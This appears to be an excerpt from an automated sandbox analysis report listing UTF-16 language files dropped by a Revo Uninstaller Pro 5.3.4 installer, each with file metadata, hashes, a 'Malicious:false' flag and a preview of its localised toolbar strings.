                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. ...J.;.3.0.@.A.:.8./.B.u.l.g.a.r.i.a.n. .....W.e.b.L.a.n.g.=.B.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...0.A.B.@.>.9.:.8.....1.0.4. .=. ...5.8.=.A.B.0.;.0.B.>.@.....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.8.....1.0.6. .=. ...8.H.5.=.0.....1.0.7. .=. .!.?.8.A.J.:.....1.0.8. .=. ...:.>.=.8.....1.0.9. .=. ...5.B.0.9.;.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.9.....1.1.1. .=. ...@.5.<.0.E.=.8.....1.1.2. .=. ...?.@.5.A.=.8.....1.1.3. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .8.7.B.@.8.5.B.5. .8.7.1.@.0.=.8.O. .5.;.5.<.5.=.B.?.....1.1.4. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .4.5.8.=.A.B.0.;.8.@.0.B.5. .8.7.1.@.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (659), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126512
                                                                                                                                                                          Entropy (8bit):3.720605069842754
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:150RW5EH5DMXV53O2d/H+gzbtey7fvDMKd5Jpf+l9yNqaWcOIcHeG:150RW5AqXV53O2d/Hf1vDHv0ecv
                                                                                                                                                                          MD5:A1E4DAB88269A98C1EE4F4959E36A157
                                                                                                                                                                          SHA1:25F2491DE087F9C6F7D1B84E245658C19C167C91
                                                                                                                                                                          SHA-256:2C6EF86AF703BF0721025E58922BE5A780EC0AAC08DD479A88D467A87904D87C
                                                                                                                                                                          SHA-512:468508A84F689FF808A9B99BF9265D1F04FCDAEBFE798803023ED70E550835761C5A505F0BF66E78B578EA51FDECF2D2CDB4E5EAD7D7309EA3D4B01220572305
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.C.z.e.c.h.....W.e.b.L.a.n.g.=.c.z.....T.r.a.n.s.l.a.t.o.r.=.T.Y.a.s...k. .J.i.Y.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.i.t.....1.0.3. .=. .N.a.s.t.a.v.e.n.......1.0.4. .=. .O.d.i.n.s.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.e.....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .D.e.t.a.i.l.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.o.v.a.t.....1.1.1. .=. .O.d.e.b.r.a.t. .p.o.l.o.~.k.u.....1.1.2. .=. .O.b.n.o.v.i.t.....1.1.3. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.e.b.r.a.t. .v.y.b.r.a.n.o.u. .p.o.l.o.~.k.u.?.....1.1.4. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.i.n.s.t.a.l.o.v.a.t. .v.y.b.r.a.n... .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.u.t.o.a.k.t.u.a.l.i.z.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):97176
                                                                                                                                                                          Entropy (8bit):3.499969901388738
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:woFhvFocuFdycapmrOS9osFVrbmlEAicBDPGy0fr:hvFoc6dycaptSW0VrqlEAicBD+y+
                                                                                                                                                                          MD5:2B6C3675752D595B68E3E1C0A5992435
                                                                                                                                                                          SHA1:790F9E5297743509F2F5ACB575886935BB768EF4
                                                                                                                                                                          SHA-256:FA6449751FB82B79A1E4F071E5C20CF0DE86D015EDA9F0ABA347937A7F1394A2
                                                                                                                                                                          SHA-512:7F5DE4C53D39E69CBD69F27211BCA76FF7ADEB52BFFB4662136ACE6291B792D417FC9C4DEA67C1BD807788D03E427151B912E1A380D770FDEC50451D770D6BBE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .D.a.n.s.k./.D.a.n.i.s.h.....W.e.b.L.a.n.g.=.D.A.N.....T.r.a.n.s.l.a.t.o.r.=.R.e.g.m.o.s.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...5...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .I.n.d.s.t.i.l.l.i.n.g.e.r.....1.0.4. .=. .A.f.i.n.s.t.a.l.l.e.r.i.n.g.....1.0.5. .=. .V...r.k.t...j.....1.0.6. .=. .J.a.g.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.f.i.n.s.t.a.l.l...r.....1.1.1. .=. .F.j.e.r.n. .e.m.n.e.....1.1.2. .=. .O.p.d.a.t...r.....1.1.3. .=. .V.i.l. .d.u. .f.j.e.r.n.e. .d.e.t. .v.a.l.g.t.e. .e.m.n.e.?.....1.1.4. .=. .V.i.l. .d.u. .a.f.i.n.s.t.a.l.l.e.r.e. .d.e.t. .v.a.l.g.t.e. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.d.a.t.e.r.i.n.g.....1.1.6. .=. .H.j...l.p.....1.1.7. .=. .H.j...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (788), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):136212
                                                                                                                                                                          Entropy (8bit):3.4484649128879137
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:YusdiMXLgWkkKnB9jGm9ROVjB5ZegxC9WFh88ff0hUWaFZDeleeDK/4I4E4L03hA:mIyXxG
                                                                                                                                                                          MD5:170AF0E2F66875D305D9A1B5C054869B
                                                                                                                                                                          SHA1:AEB176BE7A44F890269EE45E79D5999138CD3EC6
                                                                                                                                                                          SHA-256:78386718921BC10E739CD96216F97C5F41308302A7F299B59AD76CABD8523E82
                                                                                                                                                                          SHA-512:9FBE996119EDA876C7613F759CF2BE7C86F02A9D7F382AF3F51F4CECE696C898620DFC6E9540C3541532AB0C9AC82B01297DFE1CD428E2F3AE667F0C9A7C9E59
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.e.d.e.r.l.a.n.d.s./.D.u.t.c.h.....W.e.b.L.a.n.g.=.N.L.....T.r.a.n.s.l.a.t.o.r.=.J.a.n. .V.e.r.h.e.i.j.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .B.e.e.l.d.....1.0.3. .=. .O.p.t.i.e.s.....1.0.4. .=. .D.e.-.i.n.s.t.a.l.l.a.t.i.e.....1.0.5. .=. .H.u.l.p.p.r.o.g.r.a.m.m.a.'.s.....1.0.6. .=. .J.a.c.h.t.m.o.d.u.s.....1.0.7. .=. .L.i.j.s.t.....1.0.8. .=. .P.i.c.t.o.g.r.a.m.m.e.n.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .D.e.-.i.n.s.t.a.l.l.e.r.e.n.....1.1.1. .=. .I.t.e.m. .v.e.r.w.i.j.d.e.r.e.n.....1.1.2. .=. .V.e.r.n.i.e.u.w.e.n.....1.1.3. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .d.i.t. .w.i.l.t. .v.e.r.w.i.j.d.e.r.e.n.?.....1.1.4. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .h.e.t. .g.e.s.e.l.e.c.t.e.e.r.d.e. .p.r.o.g.r.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (667), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126456
                                                                                                                                                                          Entropy (8bit):3.469932961281367
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:2G/KyyIrUp+ihmoqVl4hF7bPwlBB9YK3zZ1lvQ:2GiybrVCmoqVlcFvyB0Kji
                                                                                                                                                                          MD5:17CBDCF3F67B750D9E2CFB18DA7999E7
                                                                                                                                                                          SHA1:493D989BEBAED68D57FDF72660E3664EA42FD669
                                                                                                                                                                          SHA-256:5663AF4869A89B1576748A914B63DB89A79FF8374A920D288445E2D600449DCD
                                                                                                                                                                          SHA-512:2407C09A6997C15FAAD8E49C8332504F6100EF0470192235E08DC3E7D525984E5D96D2A595C846CE2A43885BDB680E2DD84D42A0F086902C5BF1216A3CCBD202
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.n.g.l.i.s.h.....W.e.b.L.a.n.g.=.E.N.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.e.w.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r.....1.0.5. .=. .T.o.o.l.s.....1.0.6. .=. .H.u.n.t.e.r. .M.o.d.e.....1.0.7. .=. .L.i.s.t.....1.0.8. .=. .I.c.o.n.s.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .U.n.i.n.s.t.a.l.l.....1.1.1. .=. .R.e.m.o.v.e. .E.n.t.r.y.....1.1.2. .=. .R.e.f.r.e.s.h.....1.1.3. .=. .A.r.e. .y.o.u. .s.u.r.e. .t.h.a.t. .y.o.u. .w.a.n.t. .t.o. .r.e.m.o.v.e. .t.h.e. .s.e.l.e.c.t.e.d. .e.n.t.r.y.?.....1.1.4. .=. .A.r.e. .y.o.u. .s.u.r.e. .y.o.u. .w.a.n.t. .t.o. .u.n.i.n.s.t.a.l.l. .t.h.e. .s.e.l.e.c.t.e.d. .p.r.o.g.r.a.m.?.....1.1.5.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):102574
                                                                                                                                                                          Entropy (8bit):3.4292555280223818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:3BS3SpCVzylFGnh/QI2WCUHgG+d5d3cKE:3BS3SpCxuFGnh/uWCSgG+d5de
                                                                                                                                                                          MD5:A71E4B0F3A6135AEF662509B9745A3B9
                                                                                                                                                                          SHA1:B0199874CE7B88C391A17B27BBC44F5683B9DC8E
                                                                                                                                                                          SHA-256:A025E5A628208C16EA79694DD99AE311674BA66039E6D09E25F9E07972D0F055
                                                                                                                                                                          SHA-512:B542383514A9E341DFD2DAF4C8107D49CA98AFBB3D7BB81E9DCF03185BFE5C9935FCF9EEC90ED979C6DF734A60899BC249F2E1B7491A5966A3FB60DDC4EA3393
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.u.o.m.i./.F.i.n.n.i.s.h.....W.e.b.L.a.n.g.=.F.I.N.....T.r.a.n.s.l.a.t.o.r.=.O.l.l.i. .(.o.l.l.i.n.p.o.s.t.i.t.@.g.m.a.i.l...c.o.m.).....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...y.t.......1.0.3. .=. .A.s.e.t.u.k.s.e.t.....1.0.4. .=. .S.o.v.e.l.l.u.s.t.e.n. .p.o.i.s.t.o.....1.0.5. .=. .T.y...k.a.l.u.t.....1.0.6. .=. .O.s.o.i.t.u.s.t.o.i.m.i.n.t.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .K.u.v.a.k.k.e.e.t.....1.0.9. .=. .T.i.e.d.o.t.....1.1.0. .=. .P.o.i.s.t.a. .s.o.v.e.l.l.u.s.....1.1.1. .=. .P.o.i.s.t.a. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.t.......1.1.2. .=. .P...i.v.i.t... .l.u.e.t.t.e.l.o.....1.1.3. .=. .O.l.e.t.k.o. .v.a.r.m.a.,. .e.t.t... .h.a.l.u.a.t. .p.o.i.s.t.a.a. .v.a.l.i.t.u.n. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (642), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):152860
                                                                                                                                                                          Entropy (8bit):3.44749248104316
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:joijwidVJir5Wz8dm4V2s7EaYRbuSzNDCnPzA4Ke515hQFbtjkw9TSePDYNBU31L:2gLirEz8dmQ7EaYRTgnPm7Z
                                                                                                                                                                          MD5:3231DDD2F82B85DB1CD869787928DD93
                                                                                                                                                                          SHA1:AA17C84A1228555DC351571FB85E442F92C27478
                                                                                                                                                                          SHA-256:3873A122E6E00D421913C8C85D2112C85DFBB28ABB408CB44D6DC9B56CC74CB8
                                                                                                                                                                          SHA-512:4C477FAEA63D96ABF792338070CC753EA5FBBA21E23DEEE496E085D6F5478672EA3A38B7B6286303BE3D28234CF3F94BEAB9A64918A658365DE2626E861DB43B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .F.r.a.n...a.i.s./.F.r.e.n.c.h.....W.e.b.L.a.n.g.=.F.R.A.....T.r.a.n.s.l.a.t.o.r.=...m.i.l.e. .M.o.r.v.a.n.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.f.f.i.c.h.a.g.e.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .D...s.i.n.s.t.a.l.l.e.u.r.....1.0.5. .=. .A.u.t.r.e.s. .o.u.t.i.l.s.....1.0.6. .=. .M.o.d.e. .t.r.a.q.u.e.u.r.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.c...n.e.s.....1.0.9. .=. .D...t.a.i.l.l... .....1.1.0. .=. .D...s.i.n.s.t.a.l.l.e.r.....1.1.1. .=. .S.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e.....1.1.2. .=. .R.a.f.r.a...c.h.i.r.....1.1.3. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .s.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e. .s...l.e.c.t.i.o.n.n...e. .?.....1.1.4. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .d...s.i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):150688
                                                                                                                                                                          Entropy (8bit):3.487331298408884
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:NzGb5p5B0vDcOQywq61+EgpHuOmZ1of41S7aDB5ag+Jkb3bQkzMjPjXg8iM3qQoU:yT0
                                                                                                                                                                          MD5:C333FD6BEDC812B8492B9068E3DFA7B5
                                                                                                                                                                          SHA1:322DDA605843896F8EA76997EC6274E44BF2C9F5
                                                                                                                                                                          SHA-256:6443FDA6F0A0FB4F99329962A1B09CAF3BF8568C74FC9D6EEBA1302A0C29300E
                                                                                                                                                                          SHA-512:7159FF7743DA3B3B62098FC2370E4AFD26980214EBD34C76F515BA553632DD5025B78C3389E53D064710C64A1B1BB2987055EFBC8C8256F10478F22BC375A15E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.D.e.u.t.s.c.h./.G.e.r.m.a.n.....W.e.b.L.a.n.g.=.G.E.R.....T.r.a.n.s.l.a.t.o.r.=.D.i.r.k. .P.a.u.l.s.e.n. ." .A.n.d.y. .K.l.e.i.n.e.r.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.n.s.i.c.h.t.....1.0.3. .=. .E.i.n.s.t.e.l.l.u.n.g.e.n. .(.A.l.t. ..' .O.).....1.0.4. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.0.5. .=. .E.x.t.r.a.s.....1.0.6. .=. .J.a.g.d.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.n.a.n.s.i.c.h.t.....1.0.8. .=. .S.y.m.b.o.l.a.n.s.i.c.h.t.....1.0.9. .=. .D.e.t.a.i.l.a.n.s.i.c.h.t.....1.1.0. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.1.1. .=. .E.l.e.m.e.n.t. .l...s.c.h.e.n.....1.1.2. .=. .A.k.t.u.a.l.i.s.i.e.r.e.n. .(.S.t.r.g. ..' .R.).....1.1.3. .=. .M...c.h.t.e.n. .S.i.e. .d.a.s. .a.u.s.g.e.w...h.l.t.e. .E.l.e.m.e.n.t.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (763), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):131466
                                                                                                                                                                          Entropy (8bit):4.065690087759101
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:rUVdwiSTdrABIXzfGCR3ZIaqF9/Yfzbu/TysGGaqZQ/NOjYF1aCiLGH:rUVdwiSTdrABIXzfGCR3ZIaqn/YfzbuC
                                                                                                                                                                          MD5:9A0D1063F791A4803AFB207E145FB7F5
                                                                                                                                                                          SHA1:4684E675834CB94ABD0A5AA4C7DEFABCF5B8CB9A
                                                                                                                                                                          SHA-256:0561BBFFC5347477DE4F28FB6C76F0DFEE254656125201DE0268392FBCE24368
                                                                                                                                                                          SHA-512:D662103D2716357942AD16C1386CA44D9E3BFEB289A6A4E2B8B586E851C29395A623BDE0AC35F090D04B7FE12632D68D427E2D6038CFE4D78DC321A09476E31E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .............../.G.u.j.a.r.a.t.i.....W.e.b.L.a.n.g.=.G.U.J.....T.r.a.n.s.l.a.t.o.r.=.K.u.m.a.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...........1.0.3. .=. ...................1.0.4. .=. ...........................1.0.5. .=. ...............1.0.6. .=. ............. ...........1.0.7. .=. .............1.0.8. .=. ...................1.0.9. .=. ...............1.1.0. .=. ..................... ...........1.1.1. .=. ............... ....... ...........1.1.2. .=. ............... ...........1.1.3. .=. ....... ....... ........... ......... ........... ................... ....... ......... ........... .....?.....1.1.4. .=. ....... ....... ........... ......... ........... ....................... ..................... .........
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):93828
                                                                                                                                                                          Entropy (8bit):4.066173134482651
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:H3oaEv+m7B5TZ5PNQzeoh2TwMRwBCDwUnMM8yArA4ad:Xoacmzhh2TwMRwADwUnn80d
                                                                                                                                                                          MD5:06007D50FFCC9ADCEFF96CF4439D033A
                                                                                                                                                                          SHA1:9C36E3C895694F30D1632B1EC0D571F5D8A2F2F9
                                                                                                                                                                          SHA-256:4C301B86818CA1D9134A8E416D347FF50EFF071E8377F69EB838FB42FF0ABAB3
                                                                                                                                                                          SHA-512:68B40EA6FE2FF9527D62E03B9A88583B2E4AE38F8FDC4016071CB47ED7CE2DB87411BD114566E840B946600123CC251C12C0C023528DBBAEFE4DFF26443860A6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.........../.H.e.b.r.e.w.....W.e.b.L.a.n.g.=.H.E.B.....T.r.a.n.s.l.a.t.o.r.=.Y.a.r.o.n...S. .-. .Y.a.r.o.n.'.S. .T.e.a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...2...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .....................1.0.4. .=. ......... ...................1.0.5. .=. .............1.0.6. .=. ."....... .".............1.0.7. .=. ...............1.0.8. .=. .....................1.0.9. .=. ...............1.1.0. .=. ...........1.1.1. .=. ....... ...........1.1.2. .=. .............1.1.3. .=.?. ....... ...../... ........./... ............... ........... ..... ......... ...............1.1.4. .=.?. ....... ...../... ........./... ............... ........... ..... ............. .................1.1.5. .=........... ...................1.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (789), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):137504
                                                                                                                                                                          Entropy (8bit):4.127665630312148
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:nH5z/5zzxtz9IraMTSvkNgcM1o2VTHbv5frC:H5XcmC
                                                                                                                                                                          MD5:323B3488D5BF1B952B83DC562E0A3FA2
                                                                                                                                                                          SHA1:8DB1AE77803019DB4503B878537C77DCA46391A4
                                                                                                                                                                          SHA-256:B798D3535F10CCCA8507D9FA0BB891470A8D8D5364013EAAF05D0224BC2247E8
                                                                                                                                                                          SHA-512:A66EDA53342213C7D475A0569B52CA8DF8C67949C75D6EA1CAA63420D5A1DBE4BBD2818F782257356DA474E2DF558AF8DE37BA9B2614EA831910855631ABB3CE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=................./.G.r.e.e.k.(.H.e.l.l.e.n.i.c.).....W.e.b.L.a.n.g.=.G.R.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...1...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...................1.0.3. .=. .....................1.0.4. .=. .................................1.0.5. .=. .....................1.0.6. .=. ..................... .........................1.0.7. .=. .......................1.0.8. .=. .......................1.0.9. .=. .............................1.1.0. .=. ...............................1.1.1. .=. ................. ...........................1.1.2. .=. .....................1.1.3. .=. ........... ............... ....... ............. ..... ..................... ....... ..................... .................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (754), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):130882
                                                                                                                                                                          Entropy (8bit):4.087011727696048
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:UY/rr+qMUWBBZ/a/kHLM6/CgK8czSTMy/7:F/P+DUWx/06czSd/7
                                                                                                                                                                          MD5:271D39E6FF688E684A970F677FFA00B9
                                                                                                                                                                          SHA1:5A2415E31E5A7E4A5781603FF844406D48AE646A
                                                                                                                                                                          SHA-256:0B1BF07D976B9E20E2C97EE9D0C959842F885619F0282A5CAEBB882DF0075D47
                                                                                                                                                                          SHA-512:237D8C27172694F43678C79F211F11769C770E6FDE1FF9F239692B9F93FD78AF53F8D65109CCFBB111C32DA598DA67B94C78962D1A2C0A647F20B45459DAA46A
                                                                                                                                                                          Malicious:false
